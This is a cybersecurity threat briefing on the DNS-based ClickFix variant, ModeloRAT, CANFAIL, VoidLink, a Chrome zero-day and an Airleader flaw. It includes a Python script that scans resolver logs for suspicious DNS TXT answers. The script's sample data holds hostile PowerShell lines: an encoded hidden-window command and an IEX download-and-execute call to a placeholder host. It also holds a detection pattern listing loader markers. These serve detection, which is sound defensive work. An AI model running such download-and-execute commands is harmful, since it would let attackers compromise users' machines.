Daily Threat Briefing

Cyware Daily Threat Intelligence, February 16, 2026


The persistent ClickFix threat has found a stealthy new staging ground: DNS. By tricking users into running a simple nslookup command, attackers are now bypassing traditional web filters to pull malicious PowerShell scripts directly from DNS TXT records. This pivot lets ModeloRAT slip into networks disguised as routine name resolution traffic.

A formidable new threat actor, UAT-9921, has unveiled VoidLink, a modular malware framework that marks a turning point in AI-assisted development. Designed for long-term espionage in Linux cloud environments, the framework features an "on-demand" plugin system that allows it to adapt its weaponry in real-time.

Google has kicked off 2026 with an emergency update to neutralize CVE-2026-2441, a critical zero-day vulnerability already being weaponized in the wild. The flaw, a "use-after-free" bug within the browser’s CSS engine, allows attackers to hijack a user’s session through a single malicious webpage.

Top Malware Reported in the Last 24 Hours

New ClickFix attack exploits DNS for malware

A new variant of the ClickFix attack uses DNS queries to deliver malicious PowerShell payloads, marking a significant evolution in social engineering tactics. Victims are tricked into executing a custom `nslookup` command that queries an attacker-controlled DNS server. The DNS response contains a PowerShell script, which is executed on the victim's device to install malware. The attack subsequently downloads additional malicious components, including a remote access trojan known as ModeloRAT, allowing attackers to control compromised systems. Unlike previous ClickFix methods that relied on HTTP for payload delivery, this technique blends in with normal DNS traffic and lets attackers modify payloads dynamically.
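As an added detection example (not from the original briefing or from any vendor's product), the following script scans resolver logs for TXT answers that carry PowerShell-like content, which is the delivery channel described above. The pipe-delimited log format and the sample lines are constructed for illustration; the encoded blob and domain names are placeholders, not real indicators.

```python
import re
from dataclasses import dataclass, field

# Constructed sample resolver log: timestamp|client|qtype|qname|answer
# (hypothetical format, not a real product's schema; values are placeholders).
SAMPLE_LOG = """\
2026-02-16T10:01:02Z|10.0.0.12|A|www.example.com|93.184.216.34
2026-02-16T10:01:05Z|10.0.0.12|TXT|example.com|v=spf1 include:_spf.example.com -all
2026-02-16T10:02:11Z|10.0.0.44|TXT|lookup.example.invalid|powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2026-02-16T10:02:13Z|10.0.0.44|TXT|lookup.example.invalid|IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')
"""

# Tokens that rarely appear in legitimate TXT data (SPF, DKIM, site verification)
# but are typical of a PowerShell loader stage.
SCRIPT_MARKERS = re.compile(
    r"(powershell|pwsh|invoke-expression|\biex\b|-enc\b|-encodedcommand|"
    r"frombase64string|downloadstring|new-object)",
    re.IGNORECASE,
)

@dataclass
class Finding:
    timestamp: str
    client: str
    qname: str
    reasons: list = field(default_factory=list)

def analyze_txt_answers(log_text: str, max_benign_len: int = 255) -> list:
    """Return one Finding per TXT answer that looks like script delivery."""
    findings = []
    for line in log_text.splitlines():
        # split with maxsplit=4 so pipes inside the answer text are preserved
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue  # skip malformed lines rather than crash on them
        ts, client, qtype, qname, answer = parts
        if qtype != "TXT":
            continue
        reasons = []
        if SCRIPT_MARKERS.search(answer):
            reasons.append("script marker in TXT answer")
        if len(answer) > max_benign_len:
            reasons.append("oversized TXT answer")
        if reasons:
            findings.append(Finding(ts, client, qname, reasons))
    return findings

if __name__ == "__main__":
    for f in analyze_txt_answers(SAMPLE_LOG):
        print(f.timestamp, f.client, f.qname, "; ".join(f.reasons))
```

The length heuristic alone is noisy because legitimate DKIM and verification records are long and base64-like, so treat it as a secondary signal next to the marker match and correlate with endpoint telemetry showing `nslookup` followed by a PowerShell process on the same host.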

Google links Russian actor to CANFAIL malware

A previously undocumented threat actor, potentially linked to Russian intelligence, has been attributed to malware attacks targeting Ukrainian organizations, particularly in defense, military, government, and energy sectors. This group has also shown interest in aerospace and manufacturing companies connected to military operations, as well as humanitarian organizations in Ukraine. Utilizing LLMs, the actor conducts reconnaissance and social engineering, enhancing their technical capabilities. Recent phishing campaigns involved impersonating legitimate Ukrainian energy entities and embedding CANFAIL malware within RAR archives disguised as PDF files. The CANFAIL malware executes a PowerShell script that downloads additional malicious components while displaying a fake error message to victims. This threat actor is also connected to the PhantomCaptcha campaign, which targets organizations involved in Ukraine's war relief efforts through deceptive phishing tactics.

UAT-9921 deploys new VoidLink malware

A previously unknown threat actor, UAT-9921, has been observed using a new modular malware framework called VoidLink to target the technology and financial sectors. This malware, documented by Cisco Talos and Check Point, is designed for long-term stealthy access to Linux-based cloud environments and is believed to have been in development since 2019. VoidLink employs multiple programming languages, including ZigLang and C, and features capabilities like compilation-on-demand for plugins and role-based access control. It allows operators to perform internal reconnaissance and lateral movement while evading detection by security solutions. Researchers noted that VoidLink's development may involve collaboration across teams, indicating a sophisticated approach to malware deployment, with evidence of its use dating back to September 2025.

Top Vulnerabilities Reported in the Last 24 Hours

Google patches first Chrome zero-day of 2026

Google has released emergency updates to address a high-severity vulnerability in Chrome, identified as CVE-2026-2441, which has been actively exploited in the wild. This zero-day flaw stems from a use-after-free vulnerability linked to an iterator invalidation bug in CSSFontFeatureValuesMap. Exploiting this vulnerability can lead to browser crashes, data corruption, and other unpredictable behaviors. Although the patch addresses the immediate issue, Google indicated that further work is necessary to fully resolve related problems. The fix has been rolled out for users on Windows, macOS, and Linux through the Stable Desktop channel. This incident marks the first zero-day vulnerability patched in Chrome for 2026.

Critical Airleader vulnerability exposes industrial systems

A critical vulnerability in Airleader Master software, tracked as CVE-2026-1358, has been revealed by CISA, posing severe risks to industrial control systems across various critical infrastructure sectors. This flaw affects versions up to 6.381 and carries a maximum CVSS score of 9.8, indicating its potential for remote code execution attacks. The vulnerability arises from an unrestricted file upload feature, allowing attackers to execute malicious files without proper validation. As a result, successful exploitation could grant attackers complete control over systems in sectors such as chemical manufacturing, energy, healthcare, and transportation.
